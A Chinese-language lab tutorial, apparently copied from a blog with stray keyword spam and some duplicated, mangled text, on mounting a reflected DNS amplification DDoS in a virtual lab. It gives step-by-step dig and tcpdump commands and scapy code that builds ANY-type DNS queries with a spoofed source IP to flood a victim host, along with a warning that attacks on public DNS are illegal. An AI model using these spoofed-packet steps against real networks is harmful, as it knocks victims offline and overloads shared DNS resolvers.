网站不想被收录,魔方网站建设,移动公司网络维护待遇,如何创立个人网站利用DNS服务器发起反射型DDOS#xff0c;攻击带宽
基本思路#xff1a; 1、利用any类型的dns查询#xff0c;可完成发送少量请求数据#xff0c;获得大量返回数据。 2、将原请求地址改为受害者地址#xff0c;则dns会向受害者返回大量数据#xff0c;占用带宽
警告攻击带宽
基本思路 1、利用any类型的dns查询可完成发送少量请求数据获得大量返回数据。 2、将原请求地址改为受害者地址则dns会向受害者返回大量数据占用带宽
警告 利用公共dns的攻击行为会影响dns的性能请谨慎使用一旦大规模占用dns资源会造成dns拥堵属于违法犯罪行为。 实验步骤
1、验证服务器是否可正常工作
查看网关。Nat模式下所有虚拟机都是在主机下的子网里默认dns服务器地址即为网关地址 命令route -n
(2)登录攻击机使用dig查询dns 命令为dig host地址 dns服务器地址 确认DNS服务器可用
2、抓取any查询的数据包
使用攻击机抓取数据包
使用攻击机开始dig查询
停止抓包 Pkill tcpdump 3、使用scapy分析数据包
打开scapy读取数据包 Pcaprdpcap(“dns.pcap”) #读文件
Pcap[3] #获取第4条数据前三条为三次握手第四条才是dns请求。查看数据包结构
lsDNS
ls(DNSQR)构造数据包 iIP(src192.168.237.128,dst192.168.237.2)uUDP()qDNSQR(qnamebaidu.com,qtype255)dDNS(rd1,qdcount1,qdq)r(i/u/d)
sr1(r)确认可以成功发包。
4、使用靶机抓包
靶机打开wireshark开启抓包。
5、使用攻击机伪造IP源发起攻击
iIP(src192.168.237.132,dst192.168.237.2)
r(i/u/d)
sr1(r)6、观察靶机可以看到确实接收到了DNS服务器发来的数据包。
